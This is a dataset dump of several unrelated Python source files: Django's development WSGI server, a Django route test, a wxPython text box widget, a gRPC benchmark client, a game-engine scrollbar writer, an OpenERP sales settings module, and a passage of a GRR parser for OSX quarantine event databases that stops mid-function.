def is_hop_by_hop(header_name):
"""Return true if 'header_name' is an HTTP/1.1 "Hop-by-Hop" header"""
return header_name.lower() in _hop_headers
class ServerHandler(object):
"""Manage the invocation of a WSGI application"""
# Configuration parameters; can override per-subclass or per-instance
wsgi_version = (1,0)
wsgi_multithread = True
wsgi_multiprocess = True
wsgi_run_once = False
origin_server = True # We are transmitting direct to client
http_version = "1.0" # Version that should be used for response
server_software = software_version
# os_environ is used to supply configuration from the OS environment:
# by default it's a copy of 'os.environ' as of import time, but you can
# override this in e.g. your __init__ method.
os_environ = dict(os.environ.items())
# Collaborator classes
wsgi_file_wrapper = FileWrapper # set to None to disable
headers_class = Headers # must be a Headers-like class
# Error handling (also per-subclass or per-instance)
traceback_limit = None # Print entire traceback to self.get_stderr()
error_status = "500 INTERNAL SERVER ERROR"
error_headers = [('Content-Type','text/plain')]
# State variables (don't mess with these)
status = result = None
headers_sent = False
headers = None
bytes_sent = 0
def __init__(self, stdin, stdout, stderr, environ, multithread=True,
multiprocess=False):
self.stdin = stdin
self.stdout = stdout
self.stderr = stderr
self.base_env = environ
self.wsgi_multithread = multithread
self.wsgi_multiprocess = multiprocess
def run(self, application):
"""Invoke the application"""
# Note to self: don't move the close()! Asynchronous servers shouldn't
# call close() from finish_response(), so if you close() anywhere but
# the double-error branch here, you'll break asynchronous servers by
# prematurely closing. Async servers must return from 'run()' without
# closing if there might still be output to iterate over.
try:
self.setup_environ()
self.result = application(self.environ, self.start_response)
self.finish_response()
except:
try:
self.handle_error()
except:
# If we get an error handling an error, just give up already!
self.close()
raise # ...and let the actual server figure it out.
def setup_environ(self):
"""Set up the environment for one request"""
env = self.environ = self.os_environ.copy()
self.add_cgi_vars()
env['wsgi.input'] = self.get_stdin()
env['wsgi.errors'] = self.get_stderr()
env['wsgi.version'] = self.wsgi_version
env['wsgi.run_once'] = self.wsgi_run_once
env['wsgi.url_scheme'] = self.get_scheme()
env['wsgi.multithread'] = self.wsgi_multithread
env['wsgi.multiprocess'] = self.wsgi_multiprocess
if self.wsgi_file_wrapper is not None:
env['wsgi.file_wrapper'] = self.wsgi_file_wrapper
if self.origin_server and self.server_software:
env.setdefault('SERVER_SOFTWARE',self.server_software)
def finish_response(self):
"""
Send any iterable data, then close self and the iterable
Subclasses intended for use in asynchronous servers will want to
redefine this method, such that it sets up callbacks in the event loop
to iterate over the data, and to call 'self.close()' once the response
is finished.
"""
if not self.result_is_file() or not self.sendfile():
for data in self.result:
self.write(data)
self.finish_content()
self.close()
def get_scheme(self):
"""Return the URL scheme being used"""
return guess_scheme(self.environ)
def set_content_length(self):
"""Compute Content-Length or switch to chunked encoding if possible"""
try:
blocks = len(self.result)
except (TypeError, AttributeError, NotImplementedError):
pass
else:
if blocks==1:
self.headers['Content-Length'] = str(self.bytes_sent)
return
# XXX Try for chunked encoding if origin server and client is 1.1
def cleanup_headers(self):
"""Make any necessary header changes or defaults
Subclasses can extend this to add other defaults.
"""
if 'Content-Length' not in self.headers:
self.set_content_length()
def start_response(self, status, headers,exc_info=None):
"""'start_response()' callable as specified by PEP 333"""
if exc_info:
try:
if self.headers_sent:
# Re-raise original exception if headers sent
raise exc_info[0], exc_info[1], exc_info[2]
finally:
exc_info = None # avoid dangling circular ref
elif self.headers is not None:
raise AssertionError("Headers already set!")
assert isinstance(status, str),"Status must be a string"
assert len(status)>=4,"Status must be at least 4 characters"
assert int(status[:3]),"Status message must begin w/3-digit code"
assert status[3]==" ", "Status message must have a space after code"
if __debug__:
for name,val in headers:
assert isinstance(name, str),"Header names must be strings"
assert isinstance(val, str),"Header values must be strings"
assert not is_hop_by_hop(name),"Hop-by-hop headers not allowed"
self.status = status
self.headers = self.headers_class(headers)
return self.write
def send_preamble(self):
"""Transmit version/status/date/server, via self._write()"""
if self.origin_server:
if self.client_is_modern():
self._write('HTTP/%s %s\r\n' % (self.http_version,self.status))
if 'Date' not in self.headers:
self._write(
'Date: %s\r\n' % http_date()
)
if self.server_software and 'Server' not in self.headers:
self._write('Server: %s\r\n' % self.server_software)
else:
self._write('Status: %s\r\n' % self.status)
def write(self, data):
"""'write()' callable as specified by PEP 333"""
assert isinstance(data, str), "write() argument must be string"
if not self.status:
raise AssertionError("write() before start_response()")
elif not self.headers_sent:
# Before the first output, send the stored headers
self.bytes_sent = len(data) # make sure we know content-length
self.send_headers()
else:
self.bytes_sent += len(data)
# XXX check Content-Length and truncate if too many bytes written?
# If data is too large, socket will choke, so write chunks no larger
# than 32MB at a time.
length = len(data)
if length > 33554432:
offset = 0
while offset < length:
chunk_size = min(33554432, length)
self._write(data[offset:offset+chunk_size])
self._flush()
offset += chunk_size
else:
self._write(data)
self._flush()
def sendfile(self):
"""Platform-specific file transmission
Override this method in subclasses to support platform-specific
file transmission. It is only called if the application's
return iterable ('self.result') is an instance of
'self.wsgi_file_wrapper'.
This method should return a true value if it was able to actually
transmit the wrapped file-like object using a platform-specific
approach. It should return a false value if normal iteration
should be used instead. An exception can be raised to indicate
that transmission was attempted, but failed.
NOTE: this method should call 'self.send_headers()' if
'self.headers_sent' is false and it is going to attempt direct
transmission of the file1.
"""
return False # No platform-specific transmission by default
def finish_content(self):
"""Ensure headers and content have both been sent"""
if not self.headers_sent:
self.headers['Content-Length'] = "0"
self.send_headers()
else:
pass # XXX check if content-length was too short?
def close(self):
try:
self.request_handler.log_request(self.status.split(' ',1)[0], self.bytes_sent)
finally:
try:
if hasattr(self.result,'close'):
self.result.close()
finally:
self.result = self.headers = self.status = self.environ = None
self.bytes_sent = 0; self.headers_sent = False
def send_headers(self):
"""Transmit headers to the client, via self._write()"""
self.cleanup_headers()
self.headers_sent = True
if not self.origin_server or self.client_is_modern():
self.send_preamble()
self._write(str(self.headers))
def result_is_file(self):
"""True if 'self.result' is an instance of 'self.wsgi_file_wrapper'"""
wrapper = self.wsgi_file_wrapper
return wrapper is not None and isinstance(self.result,wrapper)
def client_is_modern(self):
"""True if client can accept status and headers"""
return self.environ['SERVER_PROTOCOL'].upper() != 'HTTP/0.9'
def log_exception(self,exc_info):
"""Log the 'exc_info' tuple in the server log
Subclasses may override to retarget the output or change its format.
"""
try:
from traceback import print_exception
stderr = self.get_stderr()
print_exception(
exc_info[0], exc_info[1], exc_info[2],
self.traceback_limit, stderr
)
stderr.flush()
finally:
exc_info = None
def handle_error(self):
"""Log current error, and send error output to client if possible"""
self.log_exception(sys.exc_info())
if not self.headers_sent:
self.result = self.error_output(self.environ, self.start_response)
self.finish_response()
# XXX else: attempt advanced recovery techniques for HTML or text?
def error_output(self, environ, start_response):
import traceback
start_response(self.error_status, self.error_headers[:], sys.exc_info())
return ['\n'.join(traceback.format_exception(*sys.exc_info()))]
# Pure abstract methods; *must* be overridden in subclasses
def _write(self,data):
self.stdout.write(data)
self._write = self.stdout.write
def _flush(self):
self.stdout.flush()
self._flush = self.stdout.flush
def get_stdin(self):
return self.stdin
def get_stderr(self):
return self.stderr
def add_cgi_vars(self):
self.environ.update(self.base_env)
class WSGIServer(HTTPServer):
"""BaseHTTPServer that implements the Python WSGI protocol"""
application = None
def server_bind(self):
"""Override server_bind to store the server name."""
try:
HTTPServer.server_bind(self)
except Exception, e:
raise WSGIServerException, e
self.setup_environ()
def setup_environ(self):
# Set up base environment
env = self.base_environ = {}
env['SERVER_NAME'] = self.server_name
env['GATEWAY_INTERFACE'] = 'CGI/1.1'
env['SERVER_PORT'] = str(self.server_port)
env['REMOTE_HOST']=''
env['CONTENT_LENGTH']=''
env['SCRIPT_NAME'] = ''
def get_app(self):
return self.application
def set_app(self,application):
self.application = application
class WSGIRequestHandler(BaseHTTPRequestHandler):
server_version = "WSGIServer/" + __version__
def __init__(self, *args, **kwargs):
from django.conf import settings
self.admin_media_prefix = settings.ADMIN_MEDIA_PREFIX
# We set self.path to avoid crashes in log_message() on unsupported
# requests (like "OPTIONS").
self.path = ''
BaseHTTPRequestHandler.__init__(self, *args, **kwargs)
def get_environ(self):
env = self.server.base_environ.copy()
env['SERVER_PROTOCOL'] = self.request_version
env['REQUEST_METHOD'] = self.command
if '?' in self.path:
path,query = self.path.split('?',1)
else:
path,query = self.path,''
env['PATH_INFO'] = urllib.unquote(path)
env['QUERY_STRING'] = query
env['REMOTE_ADDR'] = self.client_address[0]
if self.headers.typeheader is None:
env['CONTENT_TYPE'] = self.headers.type
else:
env['CONTENT_TYPE'] = self.headers.typeheader
length = self.headers.getheader('content-length')
if length:
env['CONTENT_LENGTH'] = length
for h in self.headers.headers:
k,v = h.split(':',1)
k=k.replace('-','_').upper(); v=v.strip()
if k in env:
continue # skip content length, type,etc.
if 'HTTP_'+k in env:
env['HTTP_'+k] += ','+v # comma-separate multiple headers
else:
env['HTTP_'+k] = v
return env
def get_stderr(self):
return sys.stderr
def handle(self):
"""Handle a single HTTP request"""
self.raw_requestline = self.rfile.readline()
if not self.parse_request(): # An error code has been sent, just exit
return
handler = ServerHandler(self.rfile, self.wfile, self.get_stderr(), self.get_environ())
handler.request_handler = self # backpointer for logging
handler.run(self.server.get_app())
def log_message(self, format, *args):
# Don't bother logging requests for admin images or the favicon.
if self.path.startswith(self.admin_media_prefix) or self.path == '/favicon.ico':
return
sys.stderr.write("[%s] %s\n" % (self.log_date_time_string(), format % args))
class AdminMediaHandler(object):
"""
WSGI middleware that intercepts calls to the admin media directory, as
defined by the ADMIN_MEDIA_PREFIX setting, and serves those images.
Use this ONLY LOCALLY, for development! This hasn't been tested for
security and is not super efficient.
"""
def __init__(self, application, media_dir=None):
from django.conf import settings
self.application = application
if not media_dir:
import django
self.media_dir = \
os.path.join(django.__path__[0], 'contrib', 'admin', 'media')
else:
self.media_dir = media_dir
self.media_url = settings.ADMIN_MEDIA_PREFIX
def file_path(self, url):
"""
Returns the path to the media file on disk for the given URL.
The passed URL is assumed to begin with ADMIN_MEDIA_PREFIX. If the
resultant file path is outside the media directory, then a ValueError
is raised.
"""
# Remove ADMIN_MEDIA_PREFIX.
relative_url = url[len(self.media_url):]
relative_path = urllib.url2pathname(relative_url)
return safe_join(self.media_dir, relative_path)
def __call__(self, environ, start_response):
import os.path
# Ignore requests that aren't under ADMIN_MEDIA_PREFIX. Also ignore
# all requests if ADMIN_MEDIA_PREFIX isn't a relative URL.
if self.media_url.startswith('http://') or self.media_url.startswith('https://') \
or not environ['PATH_INFO'].startswith(self.media_url):
return self.application(environ, start_response)
# Find the admin file and serve it up, if it exists and is readable.
try:
file_path = self.file_path(environ['PATH_INFO'])
except ValueError: # Resulting file path was not valid.
status = '404 NOT FOUND'
headers = {'Content-type': 'text/plain'}
output = ['Page not found: %s' % environ['PATH_INFO']]
start_response(status, headers.items())
return output
if not os.path.exists(file_path):
status = '404 NOT FOUND'
headers = {'Content-type': 'text/plain'}
output = ['Page not found: %s' % environ['PATH_INFO']]
else:
try:
fp = open(file_path, 'rb')
except IOError:
status = '401 UNAUTHORIZED'
headers = {'Content-type': 'text/plain'}
output = ['Permission denied: %s' % environ['PATH_INFO']]
else:
# This is a very simple implementation of conditional GET with
# the Last-Modified header. It makes media files a bit speedier
# because the files are only read off disk for the first
# request (assuming the browser/client supports conditional
# GET).
mtime = http_date(os.stat(file_path)[stat.ST_MTIME])
headers = {'Last-Modified': mtime}
if environ.get('HTTP_IF_MODIFIED_SINCE', None) == mtime:
status = '304 NOT MODIFIED'
output = []
else:
status = '200 OK'
mime_type = mimetypes.guess_type(file_path)[0]
if mime_type:
headers['Content-Type'] = mime_type
output = [fp.read()]
fp.close()
start_response(status, headers.items())
return output
def run(addr, port, wsgi_handler):
server_address = (addr, port)
httpd = WSGIServer(server_address, WSGIRequestHandler)
httpd.set_app(wsgi_handler)
httpd.serve_forever()
| mit | 5,280,051,249,911,472,000 | 35.904011 | 94 | 0.595015 | false |
ccowmu/whatistheplan.com | tests/test_routes.py | 1 | 1776 | from django.contrib.auth.models import User
from django.test import Client, TestCase
from django.core.urlresolvers import reverse
class RoutesTest(TestCase):
def setUp(self):
self.client = Client()
self.logged_in_client = Client()
self.user = User.objects.create_user("testuser", "[email protected]", "test_password")
self.logged_in_client.login(username="testuser", password="test_password")
def test_home_route(self):
"""Home returns 200"""
response = self.client.get(reverse('Home'))
self.assertEqual(response.status_code, 200)
def test_events_route(self):
"""Events returns 200"""
response = self.client.get(reverse('Events'))
self.assertEqual(response.status_code, 200)
def test_about_route(self):
"""About returns 200"""
response = self.client.get(reverse('About'))
self.assertEqual(response.status_code, 200)
def test_twitch_route(self):
response = self.client.get(reverse('Twitch'))
self.assertEqual(response.status_code, 200)
def test_sign_up_route(self):
"""Sign Up returns 200"""
response = self.client.get(reverse('Sign Up'))
self.assertEqual(response.status_code, 200)
def test_log_in_route(self):
"""Log in returns 200"""
response = self.client.get(reverse('Log In'))
self.assertEqual(response.status_code, 200)
def test_log_out_route_for_logged_in_user(self):
"""Log Out redirects home for a logged in user"""
response = self.logged_in_client.get(reverse('Log Out'))
self.assertEqual(response.status_code, 302)
self.assertEqual(response['Location'], 'http://testserver/')
def tearDown(self):
self.user.delete()
| mit | -7,607,565,814,630,485,000 | 36 | 91 | 0.646959 | false |
bblais/plasticity | plasticity/dialogs/waxy/textbox.py | 1 | 4652 | # textbox.py
import waxyobject
import wx
import core
import styles
class TextBox(wx.TextCtrl, waxyobject.WaxyObject):
__events__ = {
'Char': wx.EVT_CHAR, # do all controls have this?
'MaxLength': wx.EVT_TEXT_MAXLEN, # alias for TextMaxLen
'Text': wx.EVT_TEXT,
'TextEnter': wx.EVT_TEXT_ENTER,
'TextMaxLen': wx.EVT_TEXT_MAXLEN,
'TextURL': wx.EVT_TEXT_URL,
}
def __init__(self, parent, text="", size=None, **kwargs):
style = 0
style |= self._params(kwargs)
style |= styles.window(kwargs)
wx.TextCtrl.__init__(self, parent, wx.NewId(), text,
size=size or (125,-1), style=style)
self.BindEvents()
styles.properties(self, kwargs)
def write(self, s):
# Added so we can use a TextBox as a file-like object and redirect
# stdout to it.
self.AppendText(s)
try:
core.Yield()
except:
pass
def GetCurrentLineNumber(self):
""" Return the current line number (i.e. the number of the line the
cursor is on). """
pos = self.GetInsertionPoint()
x, y = self.PositionToXY(pos)
return y
def GetLines(self):
""" Return the current text as a list of lines. (Changing the list
does not affect the contents of the TextBox.) """
text = self.GetValue()
lines = text.split("\n")
return lines
def SetModified(self, modified):
if modified:
# set to modified by appending a dummy space and removing it again
self.AppendText(' ')
lastpos = self.GetLastPosition()
self.Remove(lastpos-1, lastpos)
else:
self.DiscardEdits()
def GetModified(self):
""" Returns true if the contents of the control were modified. (Alias
for IsModified(). """
return self.IsModified()
def InsertText(self, pos, text):
""" Insert text at the given position. """
old_insertion_point = self.GetInsertionPoint()
self.SetInsertionPoint(pos)
self.WriteText(text)
# put cursor at original insertion point
if old_insertion_point <= pos:
self.SetInsertionPoint(old_insertion_point)
else:
self.SetInsertionPoint(old_insertion_point + len(text))
# ideas:
# should Remove support negative indexes? (like slices)
# should it support slicing? e.g. del atextbox[10:20]
#
# style parameters
#_textbox_justify = {
# "left": wx.TE_LEFT,
# "center": wx.TE_CENTRE,
# "centre": wx.TE_CENTRE,
# "middle": wx.TE_CENTRE,
# "right": wx.TE_RIGHT,
#}
__styles__ = {
'justify': ({
'left': wx.TE_LEFT,
'center': wx.TE_CENTRE,
'centre': wx.TE_CENTRE,
'middle': wx.TE_CENTRE,
'right': wx.TE_RIGHT,
}, styles.DICTSTART),
'multiline': (wx.TE_MULTILINE, styles.NORMAL),
'password': (wx.TE_PASSWORD, styles.NORMAL),
'readonly': (wx.TE_READONLY, styles.NORMAL),
'wrap': (wx.TE_DONTWRAP, styles.NORMAL | styles.REVERSE),
'process_enter': (wx.TE_PROCESS_ENTER, styles.NORMAL),
'process_tab': (wx.TE_PROCESS_TAB, styles.NORMAL),
'rich': (wx.TE_RICH, styles.NORMAL),
'rich2': (wx.TE_RICH2, styles.NORMAL),
'auto_url': (wx.TE_AUTO_URL, styles.NORMAL),
'hscroll': (wx.HSCROLL, styles.NORMAL),
}
def _params(self, kwargs):
flags = 0 | wx.TE_NOHIDESEL # maybe add the option of changing this one
#flags |= styles.stylebool('multiline', wx.TE_MULTILINE, kwargs)
#flags |= styles.stylebool('password', wx.TE_PASSWORD, kwargs)
#flags |= styles.stylebool('readonly', wx.TE_READONLY, kwargs)
#flags |= styles.stylebool('wrap', wx.TE_DONTWRAP, kwargs, reverse=1)
#flags |= styles.stylebool('process_enter', wx.TE_PROCESS_ENTER, kwargs)
#flags |= styles.stylebool('process_tab', wx.TE_PROCESS_TAB, kwargs)
#flags |= styles.stylebool('rich', wx.TE_RICH, kwargs)
#flags |= styles.stylebool('rich2', wx.TE_RICH2, kwargs)
#flags |= styles.stylebool('auto_url', wx.TE_AUTO_URL, kwargs)
#flags |= styles.stylebool('hscroll', wx.HSCROLL, kwargs)
#flags |= styles.styledictstart('justify', self._textbox_justify, kwargs, 0)
flags |= styles.dostyle(self.__styles__, kwargs)
return flags
| mit | -8,663,121,945,709,910,000 | 34.34375 | 84 | 0.565993 | false |
wcevans/grpc | src/python/grpcio_tests/tests/qps/benchmark_client.py | 23 | 7701 | # Copyright 2016, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Defines test client behaviors (UNARY/STREAMING) (SYNC/ASYNC)."""
import abc
import threading
import time
from concurrent import futures
from six.moves import queue
import grpc
from src.proto.grpc.testing import messages_pb2
from src.proto.grpc.testing import services_pb2
from tests.unit import resources
from tests.unit import test_common
_TIMEOUT = 60 * 60 * 24
class GenericStub(object):
def __init__(self, channel):
self.UnaryCall = channel.unary_unary(
'/grpc.testing.BenchmarkService/UnaryCall')
self.StreamingCall = channel.stream_stream(
'/grpc.testing.BenchmarkService/StreamingCall')
class BenchmarkClient:
"""Benchmark client interface that exposes a non-blocking send_request()."""
__metaclass__ = abc.ABCMeta
def __init__(self, server, config, hist):
# Create the stub
if config.HasField('security_params'):
creds = grpc.ssl_channel_credentials(
resources.test_root_certificates())
channel = test_common.test_secure_channel(
server, creds, config.security_params.server_host_override)
else:
channel = grpc.insecure_channel(server)
# waits for the channel to be ready before we start sending messages
grpc.channel_ready_future(channel).result()
if config.payload_config.WhichOneof('payload') == 'simple_params':
self._generic = False
self._stub = services_pb2.BenchmarkServiceStub(channel)
payload = messages_pb2.Payload(
body='\0' * config.payload_config.simple_params.req_size)
self._request = messages_pb2.SimpleRequest(
payload=payload,
response_size=config.payload_config.simple_params.resp_size)
else:
self._generic = True
self._stub = GenericStub(channel)
self._request = '\0' * config.payload_config.bytebuf_params.req_size
self._hist = hist
self._response_callbacks = []
def add_response_callback(self, callback):
"""callback will be invoked as callback(client, query_time)"""
self._response_callbacks.append(callback)
@abc.abstractmethod
def send_request(self):
"""Non-blocking wrapper for a client's request operation."""
raise NotImplementedError()
def start(self):
pass
def stop(self):
pass
def _handle_response(self, client, query_time):
self._hist.add(query_time * 1e9) # Report times in nanoseconds
for callback in self._response_callbacks:
callback(client, query_time)
class UnarySyncBenchmarkClient(BenchmarkClient):
def __init__(self, server, config, hist):
super(UnarySyncBenchmarkClient, self).__init__(server, config, hist)
self._pool = futures.ThreadPoolExecutor(
max_workers=config.outstanding_rpcs_per_channel)
def send_request(self):
# Send requests in seperate threads to support multiple outstanding rpcs
# (See src/proto/grpc/testing/control.proto)
self._pool.submit(self._dispatch_request)
def stop(self):
self._pool.shutdown(wait=True)
self._stub = None
def _dispatch_request(self):
start_time = time.time()
self._stub.UnaryCall(self._request, _TIMEOUT)
end_time = time.time()
self._handle_response(self, end_time - start_time)
class UnaryAsyncBenchmarkClient(BenchmarkClient):
def send_request(self):
# Use the Future callback api to support multiple outstanding rpcs
start_time = time.time()
response_future = self._stub.UnaryCall.future(self._request, _TIMEOUT)
response_future.add_done_callback(
lambda resp: self._response_received(start_time, resp))
def _response_received(self, start_time, resp):
resp.result()
end_time = time.time()
self._handle_response(self, end_time - start_time)
def stop(self):
self._stub = None
class _SyncStream(object):
def __init__(self, stub, generic, request, handle_response):
self._stub = stub
self._generic = generic
self._request = request
self._handle_response = handle_response
self._is_streaming = False
self._request_queue = queue.Queue()
self._send_time_queue = queue.Queue()
def send_request(self):
self._send_time_queue.put(time.time())
self._request_queue.put(self._request)
def start(self):
self._is_streaming = True
response_stream = self._stub.StreamingCall(self._request_generator(),
_TIMEOUT)
for _ in response_stream:
self._handle_response(
self, time.time() - self._send_time_queue.get_nowait())
def stop(self):
self._is_streaming = False
def _request_generator(self):
while self._is_streaming:
try:
request = self._request_queue.get(block=True, timeout=1.0)
yield request
except queue.Empty:
pass
class StreamingSyncBenchmarkClient(BenchmarkClient):
def __init__(self, server, config, hist):
super(StreamingSyncBenchmarkClient, self).__init__(server, config, hist)
self._pool = futures.ThreadPoolExecutor(
max_workers=config.outstanding_rpcs_per_channel)
self._streams = [
_SyncStream(self._stub, self._generic, self._request,
self._handle_response)
for _ in xrange(config.outstanding_rpcs_per_channel)
]
self._curr_stream = 0
def send_request(self):
# Use a round_robin scheduler to determine what stream to send on
self._streams[self._curr_stream].send_request()
self._curr_stream = (self._curr_stream + 1) % len(self._streams)
def start(self):
for stream in self._streams:
self._pool.submit(stream.start)
def stop(self):
for stream in self._streams:
stream.stop()
self._pool.shutdown(wait=True)
self._stub = None
| bsd-3-clause | 7,927,491,750,135,370,000 | 35.15493 | 80 | 0.65446 | false |
joaormatos/anaconda | Chowdren/chowdren/writers/extensions/EasyScrollbar.py | 1 | 1944 | from chowdren.writers.objects import ObjectWriter
from chowdren.common import get_animation_name, to_c, make_color
from chowdren.writers.events import (ComparisonWriter, ActionMethodWriter,
ConditionMethodWriter, ExpressionMethodWriter, make_table)
from mmfparser.bitdict import BitDict
from mmfparser.data.font import LogFont
import glob, os
class ScrollbarObject(ObjectWriter):
class_name = 'ScrollbarObject'
filename = 'scrollbarext'
def write_init(self, writer):
data = self.get_data()
width = data.readShort(True)
height = data.readShort(True)
#hidden = data.readByte() != 0
#enabled = data.readByte() != 0
#tab_stop = data.readByte() != 0
data.skipBytes(3)
vertical = data.readByte() != 0
min_val = data.readInt(True)
max_val = data.readInt(True)
val = data.readInt(True)
# Last 4 bytes are always '4 0 0 0' (?)
writer.putlnc('width = %s;', width)
writer.putlnc('height = %s;', height)
writer.putlnc('vertical = %s;', vertical)
writer.putlnc('min_val = %s;', min_val)
writer.putlnc('max_val = %s;', max_val)
writer.putlnc('init_scrollbar(%s);', val)
def has_updates(self):
return True
#def get_sources(self):
# script_dir = os.path.dirname(__file__)
# base_dir = os.path.join(script_dir, '..', '..', '..', 'base')
# base_dir = os.path.abspath(base_dir)
# print glob.glob(os.path.join(base_dir, 'staticlibs', 'gwen', '*.cpp'))
# return ['objects/scrollbarext.cpp']
actions = make_table(ActionMethodWriter, {
1 : 'set_scroll_range',
9 : 'set_width',
10 : 'set_height',
11 : 'set_visible(true)',
12 : 'set_visible(false)'
})
conditions = make_table(ConditionMethodWriter, {
})
expressions = make_table(ExpressionMethodWriter, {
0 : 'get_value'
})
def get_object():
return ScrollbarObject
| gpl-3.0 | -8,162,581,802,974,518,000 | 28.907692 | 79 | 0.622942 | false |
0k/OpenUpgrade | addons/sale_stock/res_config.py | 331 | 5235 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Business Applications
# Copyright (C) 2004-2012 OpenERP S.A. (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import openerp
from openerp import SUPERUSER_ID
from openerp.osv import fields, osv
from openerp.tools.translate import _
class sale_configuration(osv.osv_memory):
_inherit = 'sale.config.settings'
_columns = {
'group_invoice_deli_orders': fields.boolean('Generate invoices after and based on delivery orders',
implied_group='sale_stock.group_invoice_deli_orders',
help="To allow your salesman to make invoices for Delivery Orders using the menu 'Deliveries to Invoice'."),
'task_work': fields.boolean("Prepare invoices based on task's activities",
help='Lets you transfer the entries under tasks defined for Project Management to '
'the Timesheet line entries for particular date and particular user with the effect of creating, editing and deleting either ways '
'and to automatically creates project tasks from procurement lines.\n'
'-This installs the modules project_timesheet and sale_service.'),
'default_order_policy': fields.selection(
[('manual', 'Invoice based on sales orders'), ('picking', 'Invoice based on deliveries')],
'The default invoicing method is', default_model='sale.order',
help="You can generate invoices based on sales orders or based on shippings."),
'module_delivery': fields.boolean('Allow adding shipping costs',
help='Allows you to add delivery methods in sales orders and delivery orders.\n'
'You can define your own carrier and delivery grids for prices.\n'
'-This installs the module delivery.'),
'default_picking_policy' : fields.boolean("Deliver all at once when all products are available.",
help = "Sales order by default will be configured to deliver all products at once instead of delivering each product when it is available. This may have an impact on the shipping price."),
'group_mrp_properties': fields.boolean('Product properties on order lines',
implied_group='sale.group_mrp_properties',
help="Allows you to tag sales order lines with properties."),
'module_project_timesheet': fields.boolean("Project Timesheet"),
'module_sale_service': fields.boolean("Sale Service"),
'group_route_so_lines': fields.boolean('Choose MTO, drop shipping,... on sales order lines',
implied_group='sale_stock.group_route_so_lines',
help="Allows you to choose a delivery route on sales order lines"),
}
_defaults = {
'default_order_policy': 'manual',
}
def default_get(self, cr, uid, fields, context=None):
res = super(sale_configuration, self).default_get(cr, uid, fields, context)
# task_work, time_unit depend on other fields
res['task_work'] = res.get('module_sale_service') and res.get('module_project_timesheet')
return res
def get_default_sale_config(self, cr, uid, ids, context=None):
ir_values = self.pool.get('ir.values')
default_picking_policy = ir_values.get_default(cr, uid, 'sale.order', 'picking_policy')
return {
'default_picking_policy': default_picking_policy == 'one',
}
def set_sale_defaults(self, cr, uid, ids, context=None):
if uid != SUPERUSER_ID and not self.pool['res.users'].has_group(cr, uid, 'base.group_erp_manager'):
raise openerp.exceptions.AccessError(_("Only administrators can change the settings"))
ir_values = self.pool.get('ir.values')
wizard = self.browse(cr, uid, ids)[0]
default_picking_policy = 'one' if wizard.default_picking_policy else 'direct'
ir_values.set_default(cr, SUPERUSER_ID, 'sale.order', 'picking_policy', default_picking_policy)
res = super(sale_configuration, self).set_sale_defaults(cr, uid, ids, context)
return res
def onchange_invoice_methods(self, cr, uid, ids, group_invoice_so_lines, group_invoice_deli_orders, context=None):
if not group_invoice_deli_orders:
return {'value': {'default_order_policy': 'manual'}}
if not group_invoice_so_lines:
return {'value': {'default_order_policy': 'picking'}}
return {}
| agpl-3.0 | 4,673,494,245,140,591,000 | 55.902174 | 200 | 0.65043 | false |
MiniSEC/GRR_clone | parsers/osx_quarantine.py | 6 | 2638 | #!/usr/bin/env python
#
# Copyright 2012 Google Inc. All Rights Reserved.
"""Parser for OSX quarantine sqlite files."""
__program__ = "osx_quarantine.py"
import datetime
import glob
import locale
import sys
from grr.parsers import sqlite_file
class OSXQuarantineEvents(sqlite_file.SQLiteFile):
"""Class for handling the parsing of a OSX quarantine events.
Use as:
c = OSXQuarantineEvents(open('com.apple.LaunchServices.QuarantineEvents'))
for event in c.Parse():
print event
"""
# OSX Timestamp is seconds since January 1st 2001.
EVENTS_QUERY = ("select (LSQuarantineTimeStamp+978328800)*1e6,"
"LSQuarantineAgentBundleIdentifier, LSQuarantineAgentName,"
"LSQuarantineDataURLString, LSQuarantineSenderName,"
"LSQuarantineSenderAddress, LSQuarantineTypeNumber,"
"LSQuarantineOriginTitle, LSQuarantineOriginURLString,"
"LSQuarantineOriginAlias "
"from LSQuarantineEvent "
"ORDER BY LSQuarantineTimeStamp"
)
def Parse(self):
"""Iterator returning dict for each entry in history."""
for data in self.Query(self.EVENTS_QUERY):
(timestamp, agent_bundle_identifier, agent_name, url, sender,
sender_address, type_number, title, referrer, referrer_alias) = data
yield [timestamp, "OSX_QUARANTINE", url, referrer, title, agent_name,
agent_bundle_identifier, sender, sender_address, type_number,
referrer_alias]
def main(argv):
if len(argv) < 2:
print "Usage: %s com.apple.LaunchServices.QuarantineEvents" % __program__
sys.exit(1)
encoding = locale.getpreferredencoding()
if encoding.upper() != "UTF-8":
print "%s requires an UTF-8 capable console/terminal" % __program__
sys.exit(1)
files_to_process = []
